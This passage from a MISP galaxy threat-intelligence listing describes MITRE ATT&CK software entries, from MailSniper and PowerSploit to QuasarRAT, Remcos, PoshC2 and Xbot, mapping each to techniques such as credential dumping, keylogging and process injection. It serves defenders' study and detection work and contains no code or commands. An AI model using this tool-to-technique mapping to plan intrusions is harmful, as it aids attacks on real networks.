uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 5189. Table References
Links
https://attack.mitre.org/software/S0192
https://github.com/n1nj4sec/pupy

MailSniper - S0413

MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)

The tag is: misp-galaxy:mitre-tool="MailSniper - S0413"

MailSniper - S0413 is also known as:

MailSniper

View relationships graph

MailSniper - S0413 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"

Table 5190. Table References
Links
https://attack.mitre.org/software/S0413
https://github.com/dafthack/MailSniper

Expand - S0361

[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)

The tag is: misp-galaxy:mitre-tool="Expand - S0361"

Expand - S0361 is also known as:

Expand

View relationships graph

Expand - S0361 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 5191. Table References
Links
https://attack.mitre.org/software/S0361
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand
http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/

Tor - S0183

[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)

The tag is: misp-galaxy:mitre-tool="Tor - S0183"

Tor - S0183 is also known as:

View relationships graph

Tor - S0183 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

Table 5192. Table References
Links
https://attack.mitre.org/software/S0183
http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf

Forfiles - S0193

[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)

The tag is: misp-galaxy:mitre-tool="Forfiles - S0193"

Forfiles - S0193 is also known as:

Forfiles

View relationships graph

Forfiles - S0193 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 5193. Table References
Links
https://attack.mitre.org/software/S0193
https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)

Out1 - S0594

[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)

The tag is: misp-galaxy:mitre-tool="Out1 - S0594"

Out1 - S0594 is also known as:

Out1

View relationships graph

Out1 - S0594 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 5194. Table References
Links
https://attack.mitre.org/software/S0594
https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

Responder - S0174

Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)

The tag is: misp-galaxy:mitre-tool="Responder - S0174"

Responder - S0174 is also known as:

Responder

View relationships graph

Responder - S0174 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 5195. Table References
Links
https://attack.mitre.org/software/S0174
https://github.com/SpiderLabs/Responder

PowerSploit - S0194

[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)

The tag is: misp-galaxy:mitre-tool="PowerSploit - S0194"

PowerSploit - S0194 is also known as:

PowerSploit

View relationships graph

PowerSploit - S0194 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1547.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 5196. Table References
Links
https://attack.mitre.org/software/S0194
https://github.com/PowerShellMafia/PowerSploit
http://www.powershellmagazine.com/2014/07/08/powersploit/
http://powersploit.readthedocs.io

meek - S0175

[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.

The tag is: misp-galaxy:mitre-tool="meek - S0175"

meek - S0175 is also known as:

meek

View relationships graph

meek - S0175 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004" with estimative-language:likelihood-probability="almost-certain"

Table 5197. Table References
Links
https://attack.mitre.org/software/S0175

IronNetInjector - S0581

[IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021 )

The tag is: misp-galaxy:mitre-tool="IronNetInjector - S0581"

IronNetInjector - S0581 is also known as:

IronNetInjector

View relationships graph

IronNetInjector - S0581 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

Table 5198. Table References
Links
https://attack.mitre.org/software/S0581
https://unit42.paloaltonetworks.com/ironnetinjector/

ConnectWise - S0591

[ConnectWise](https://attack.mitre.org/software/S0591) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://attack.mitre.org/groups/G0069) and [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) to connect to and conduct lateral movement in target environments.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)

The tag is: misp-galaxy:mitre-tool="ConnectWise - S0591"

ConnectWise - S0591 is also known as:

ConnectWise
ScreenConnect

View relationships graph

ConnectWise - S0591 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 5199. Table References
Links
https://attack.mitre.org/software/S0591
https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies
https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

SDelete - S0195

[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)

The tag is: misp-galaxy:mitre-tool="SDelete - S0195"

SDelete - S0195 is also known as:

SDelete

View relationships graph

SDelete - S0195 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 5200. Table References
Links
https://attack.mitre.org/software/S0195
https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete

MimiPenguin - S0179

[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)

The tag is: misp-galaxy:mitre-tool="MimiPenguin - S0179"

MimiPenguin - S0179 is also known as:

MimiPenguin

View relationships graph

MimiPenguin - S0179 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Proc Filesystem - T1003.007" with estimative-language:likelihood-probability="almost-certain"

Table 5201. Table References
Links
https://attack.mitre.org/software/S0179
https://github.com/huntergregal/mimipenguin

Havij - S0224

[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)

The tag is: misp-galaxy:mitre-tool="Havij - S0224"

Havij - S0224 is also known as:

Havij

View relationships graph

Havij - S0224 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 5202. Table References
Links
https://attack.mitre.org/software/S0224
https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/

sqlmap - S0225

[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)

The tag is: misp-galaxy:mitre-tool="sqlmap - S0225"

sqlmap - S0225 is also known as:

sqlmap

View relationships graph

sqlmap - S0225 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 5203. Table References
Links
https://attack.mitre.org/software/S0225
http://sqlmap.org/

QuasarRAT - S0262

[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that is publicly available on GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language. (Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018)

The tag is: misp-galaxy:mitre-tool="QuasarRAT - S0262"

QuasarRAT - S0262 is also known as:

QuasarRAT
xRAT

View relationships graph

QuasarRAT - S0262 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 5204. Table References
Links
https://attack.mitre.org/software/S0262
https://github.com/quasar/QuasarRAT
https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/
https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf
https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

spwebmember - S0227

[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)

The tag is: misp-galaxy:mitre-tool="spwebmember - S0227"

spwebmember - S0227 is also known as:

spwebmember

View relationships graph

spwebmember - S0227 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002" with estimative-language:likelihood-probability="almost-certain"

Table 5205. Table References
Links
https://attack.mitre.org/software/S0227
https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

Remcos - S0332

[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)

The tag is: misp-galaxy:mitre-tool="Remcos - S0332"

Remcos - S0332 is also known as:

Remcos

View relationships graph

Remcos - S0332 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

Table 5206. Table References
Links
https://attack.mitre.org/software/S0332
https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/
https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html
https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html

PoshC2 - S0378

[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)

The tag is: misp-galaxy:mitre-tool="PoshC2 - S0378"

PoshC2 - S0378 is also known as:

PoshC2

View relationships graph

PoshC2 - S0378 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 5207. Table References
Links
https://attack.mitre.org/software/S0378
https://github.com/nettitude/PoshC2_Python

AdFind - S0552

[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)

The tag is: misp-galaxy:mitre-tool="AdFind - S0552"

AdFind - S0552 is also known as:

AdFind

View relationships graph

AdFind - S0552 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 5208. Table References
Links
https://attack.mitre.org/software/S0552
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ [https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ ]
https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

RemoteUtilities - S0592

[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines.(Citation: Trend Micro Muddy Water March 2021)

The tag is: misp-galaxy:mitre-tool="RemoteUtilities - S0592"

RemoteUtilities - S0592 is also known as:

RemoteUtilities

View relationships graph

RemoteUtilities - S0592 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 5209. Table References
Links
https://attack.mitre.org/software/S0592
https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

Xbot - S0298

[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)

The tag is: misp-galaxy:mitre-tool="Xbot - S0298"

Xbot - S0298 is also known as:

Xbot

View relationships graph

Xbot - S0298 has relationships with:

similar: misp-galaxy:banker="TinyNuke" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Xbot" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="TinyNuke" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
